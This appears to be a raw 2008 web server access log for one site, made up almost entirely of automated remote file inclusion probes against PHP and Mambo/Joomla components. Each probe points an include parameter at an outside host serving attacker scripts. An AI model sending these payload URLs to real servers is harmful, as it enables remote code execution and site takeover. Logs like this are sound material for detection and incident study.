69.248.147.137 - - [26/Oct/2008:18:03:38 -0700] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
69.248.147.137 - - [26/Oct/2008:18:03:38 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
69.248.147.137 - - [26/Oct/2008:18:03:39 -0700] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
69.248.147.137 - - [26/Oct/2008:18:03:39 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
69.248.147.137 - - [26/Oct/2008:18:03:39 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
85.92.87.42 - - [26/Oct/2008:18:04:18 -0700] "GET /logs/access_080707.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.vspeaking.com"
85.92.87.42 - - [26/Oct/2008:18:04:26 -0700] "GET /logs/access_080707.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.vspeaking.com"
98.202.67.0 - - [26/Oct/2008:18:07:09 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
98.202.67.0 - - [26/Oct/2008:18:07:09 -0700] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
98.202.67.0 - - [26/Oct/2008:18:07:09 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
78.110.165.76 - - [26/Oct/2008:18:07:57 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bowandbullet.com/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
78.110.165.76 - - [26/Oct/2008:18:07:57 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bowandbullet.com/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
78.110.165.76 - - [26/Oct/2008:18:07:57 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bowandbullet.com/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
222.100.51.165 - - [26/Oct/2008:18:08:27 -0700] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
222.100.51.165 - - [26/Oct/2008:18:08:27 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
222.100.51.165 - - [26/Oct/2008:18:08:27 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
98.210.195.32 - - [26/Oct/2008:18:09:06 -0700] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
98.210.195.32 - - [26/Oct/2008:18:09:06 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
98.210.195.32 - - [26/Oct/2008:18:09:06 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
62.87.154.41 - - [26/Oct/2008:18:09:20 -0700] "GET /?DOCUMENT_ROOT=http://keizai.ll.u-ryukyu.ac.jp/cheatingisacrime.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.vspeaking.com"
62.87.154.41 - - [26/Oct/2008:18:09:49 -0700] "GET /?DOCUMENT_ROOT=http://keizai.ll.u-ryukyu.ac.jp/cheatingisacrime.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.vspeaking.com"
78.110.165.76 - - [26/Oct/2008:18:09:57 -0700] "GET /logs/access.log%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bowandbullet.com/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
70.85.192.194 - - [26/Oct/2008:18:13:04 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://vidinas.net/tmp/images/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.85.192.194 - - [26/Oct/2008:18:13:07 -0700] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://vidinas.net/tmp/images/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
69.5.81.37 - - [26/Oct/2008:18:13:33 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
69.5.81.37 - - [26/Oct/2008:18:13:33 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
69.5.81.37 - - [26/Oct/2008:18:13:33 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
87.238.163.25 - - [26/Oct/2008:18:14:19 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bowandbullet.com/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
87.238.163.25 - - [26/Oct/2008:18:14:21 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bowandbullet.com/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
87.238.163.25 - - [26/Oct/2008:18:14:22 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bowandbullet.com/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
80.67.23.90 - - [26/Oct/2008:18:14:31 -0700] "GET /logs/access_080804.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://pwr.jp//acc/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.23.90 - - [26/Oct/2008:18:14:31 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://pwr.jp//acc/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.23.90 - - [26/Oct/2008:18:14:31 -0700] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://pwr.jp//acc/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
222.100.51.165 - - [26/Oct/2008:18:16:25 -0700] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
222.100.51.165 - - [26/Oct/2008:18:16:25 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
222.100.51.165 - - [26/Oct/2008:18:16:26 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
80.67.23.90 - - [26/Oct/2008:18:16:42 -0700] "GET /logs/access_080707.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://pwr.jp//acc/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
202.181.105.117 - - [26/Oct/2008:18:17:41 -0700] "GET /logs/access_080804.log/index.php?body=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
202.181.105.117 - - [26/Oct/2008:18:17:42 -0700] "GET /index.php?body=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
202.181.105.117 - - [26/Oct/2008:18:17:42 -0700] "GET /logs/index.php?body=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
80.67.23.90 - - [26/Oct/2008:18:18:22 -0700] "GET /logs/access.log/?sourcedir=http://pwr.jp//acc/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.23.90 - - [26/Oct/2008:18:18:22 -0700] "GET /?sourcedir=http://pwr.jp//acc/r0x.gif??? HTTP/1.1" 200 779 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.23.90 - - [26/Oct/2008:18:18:22 -0700] "GET /logs/?sourcedir=http://pwr.jp//acc/r0x.gif??? HTTP/1.1" 200 2368 "-" "libwww-perl/5.808" "www.vspeaking.com"
121.124.127.40 - - [26/Oct/2008:18:19:12 -0700] "GET /logs/access_080804.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
121.124.127.40 - - [26/Oct/2008:18:19:12 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
121.124.127.40 - - [26/Oct/2008:18:19:13 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
202.181.105.117 - - [26/Oct/2008:18:20:25 -0700] "GET /logs/access_080811.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
202.181.105.117 - - [26/Oct/2008:18:20:25 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
202.181.105.117 - - [26/Oct/2008:18:20:25 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
87.238.163.25 - - [26/Oct/2008:18:23:47 -0700] "GET /logs/access.log%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bowandbullet.com/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
131.220.23.114 - - [26/Oct/2008:18:28:14 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dti.gov.ph/iiddss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
131.220.23.114 - - [26/Oct/2008:18:28:21 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.dti.gov.ph/iiddss.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
62.87.154.41 - - [26/Oct/2008:18:28:35 -0700] "GET /logs/access_080825.log/?DOCUMENT_ROOT=http://keizai.ll.u-ryukyu.ac.jp/cheatingisacrime.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
62.87.154.41 - - [26/Oct/2008:18:28:35 -0700] "GET /?DOCUMENT_ROOT=http://keizai.ll.u-ryukyu.ac.jp/cheatingisacrime.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.vspeaking.com"
62.87.154.41 - - [26/Oct/2008:18:28:36 -0700] "GET /logs/?DOCUMENT_ROOT=http://keizai.ll.u-ryukyu.ac.jp/cheatingisacrime.txt? HTTP/1.1" 200 2368 "-" "libwww-perl/5.803" "www.vspeaking.com"
62.87.154.41 - - [26/Oct/2008:18:28:50 -0700] "GET /?DOCUMENT_ROOT=http://keizai.ll.u-ryukyu.ac.jp/cheatingisacrime.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.vspeaking.com"
62.87.154.41 - - [26/Oct/2008:18:28:51 -0700] "GET /logs/?DOCUMENT_ROOT=http://keizai.ll.u-ryukyu.ac.jp/cheatingisacrime.txt? HTTP/1.1" 200 2368 "-" "libwww-perl/5.803" "www.vspeaking.com"
121.124.127.40 - - [26/Oct/2008:18:29:42 -0700] "GET /logs/access_080811.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
207.58.144.202 - - [26/Oct/2008:18:31:00 -0700] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.vspeaking.com"
207.58.144.202 - - [26/Oct/2008:18:31:00 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.vspeaking.com"
207.58.144.202 - - [26/Oct/2008:18:31:00 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.vspeaking.com"
202.181.105.117 - - [26/Oct/2008:18:31:14 -0700] "GET /logs/access_080707.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
216.139.67.20 - - [26/Oct/2008:18:33:56 -0700] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
216.139.67.20 - - [26/Oct/2008:18:33:56 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
216.139.67.20 - - [26/Oct/2008:18:33:56 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.vspeaking.com"
202.181.105.117 - - [26/Oct/2008:18:35:21 -0700] "GET /logs/access.log/index.php?body=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:18:36:40 -0700] "GET /skin/zero_vote/error.php?dir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:18:36:40 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:18:36:40 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:18:37:41 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:18:37:41 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:18:37:41 -0700] "GET /skin/zero_vote/error.php?dir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
78.110.165.76 - - [26/Oct/2008:18:38:56 -0700] "GET /logs/access.log/?INCLUDE_FOLDER=http://bowandbullet.com/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
78.110.165.76 - - [26/Oct/2008:18:38:56 -0700] "GET /?INCLUDE_FOLDER=http://bowandbullet.com/z6id.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.vspeaking.com"
78.110.165.76 - - [26/Oct/2008:18:38:56 -0700] "GET /logs/?INCLUDE_FOLDER=http://bowandbullet.com/z6id.txt??? HTTP/1.1" 200 2368 "-" "libwww-perl/5.810" "www.vspeaking.com"
72.52.203.175 - - [26/Oct/2008:18:39:25 -0700] "GET /?INCLUDE_FOLDER=http://bowandbullet.com/z6id.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.vspeaking.com"
72.52.203.175 - - [26/Oct/2008:18:39:25 -0700] "GET /logs/access.log/?INCLUDE_FOLDER=http://bowandbullet.com/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
72.52.203.175 - - [26/Oct/2008:18:39:25 -0700] "GET /logs/?INCLUDE_FOLDER=http://bowandbullet.com/z6id.txt??? HTTP/1.1" 200 2368 "-" "libwww-perl/5.810" "www.vspeaking.com"
211.232.143.29 - - [26/Oct/2008:18:40:57 -0700] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.vennom.t35.com/idfell.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.vspeaking.com"
211.232.143.29 - - [26/Oct/2008:18:40:57 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.vennom.t35.com/idfell.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.vspeaking.com"
211.232.143.29 - - [26/Oct/2008:18:40:57 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.vennom.t35.com/idfell.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.vspeaking.com"
89.218.85.18 - - [26/Oct/2008:18:42:14 -0700] "GET /logs/access.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.buszkereso.hu/Albania//components/com_rsgallery/fickmaus.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [26/Oct/2008:18:42:14 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.buszkereso.hu/Albania//components/com_rsgallery/fickmaus.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [26/Oct/2008:18:42:14 -0700] "GET /logs/access.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.buszkereso.hu/Albania//components/com_rsgallery/fickmaus.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [26/Oct/2008:18:42:14 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.buszkereso.hu/Albania//components/com_rsgallery/fickmaus.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [26/Oct/2008:18:42:15 -0700] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.buszkereso.hu/Albania//components/com_rsgallery/fickmaus.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
78.110.165.76 - - [26/Oct/2008:18:43:55 -0700] "GET /logs/access_080804.log/?INCLUDE_FOLDER=http://bowandbullet.com/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
72.52.203.175 - - [26/Oct/2008:18:44:08 -0700] "GET /logs/access_080804.log/?INCLUDE_FOLDER=http://bowandbullet.com/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
87.238.163.25 - - [26/Oct/2008:18:44:39 -0700] "GET /logs/?INCLUDE_FOLDER=http://bowandbullet.com/z6id.txt??? HTTP/1.1" 200 2368 "-" "libwww-perl/5.79" "www.vspeaking.com"
87.238.163.25 - - [26/Oct/2008:18:44:39 -0700] "GET /?INCLUDE_FOLDER=http://bowandbullet.com/z6id.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.vspeaking.com"
87.238.163.25 - - [26/Oct/2008:18:44:39 -0700] "GET /logs/access.log/?INCLUDE_FOLDER=http://bowandbullet.com/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:18:46:48 -0700] "GET /logs/access.log/?sourcedir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:18:46:48 -0700] "GET /logs/?sourcedir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:18:46:48 -0700] "GET /?sourcedir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
62.87.154.41 - - [26/Oct/2008:18:46:48 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://keizai.ll.u-ryukyu.ac.jp/cheatingisacrime.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
62.87.154.41 - - [26/Oct/2008:18:46:48 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://keizai.ll.u-ryukyu.ac.jp/cheatingisacrime.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
62.87.154.41 - - [26/Oct/2008:18:46:48 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://keizai.ll.u-ryukyu.ac.jp/cheatingisacrime.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:18:47:19 -0700] "GET /?sourcedir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:18:47:20 -0700] "GET /logs/access.log/?sourcedir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:18:47:20 -0700] "GET /logs/?sourcedir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.vspeaking.com"
89.218.85.18 - - [26/Oct/2008:18:47:29 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.msb.edu.ptc.pl/new/iiss.xt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [26/Oct/2008:18:47:35 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.msb.edu.ptc.pl/new/iiss.xt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:18:49:43 -0700] "GET /logs/access.log/?sourcedir=http://www.stormpages.com/arale/child/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:18:49:43 -0700] "GET /?sourcedir=http://www.stormpages.com/arale/child/v7id.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:18:49:43 -0700] "GET /logs/?sourcedir=http://www.stormpages.com/arale/child/v7id.txt??? HTTP/1.1" 200 2368 "-" "libwww-perl/5.805" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:18:49:46 -0700] "GET /logs/access.log/?sourcedir=http://www.stormpages.com/arale/child/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:18:49:46 -0700] "GET /?sourcedir=http://www.stormpages.com/arale/child/v7id.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
219.85.63.226 - - [26/Oct/2008:18:49:46 -0700] "GET /logs/?sourcedir=http://www.stormpages.com/arale/child/v7id.txt??? HTTP/1.1" 200 2368 "-" "libwww-perl/5.805" "www.vspeaking.com"
121.124.127.40 - - [26/Oct/2008:18:51:19 -0700] "GET /logs/access_080804.log/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
121.124.127.40 - - [26/Oct/2008:18:51:20 -0700] "GET /errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
121.124.127.40 - - [26/Oct/2008:18:51:20 -0700] "GET /logs/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
121.124.127.40 - - [26/Oct/2008:18:51:26 -0700] "GET /logs/access_080804.log/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
121.124.127.40 - - [26/Oct/2008:18:51:27 -0700] "GET /errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
121.124.127.40 - - [26/Oct/2008:18:51:27 -0700] "GET /logs/errors.php?error=http://reynoldsdnaproject.com///photos/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
87.238.163.25 - - [26/Oct/2008:18:51:44 -0700] "GET /logs/access_080804.log/?INCLUDE_FOLDER=http://bowandbullet.com/z6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
218.38.34.152 - - [26/Oct/2008:18:54:56 -0700] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
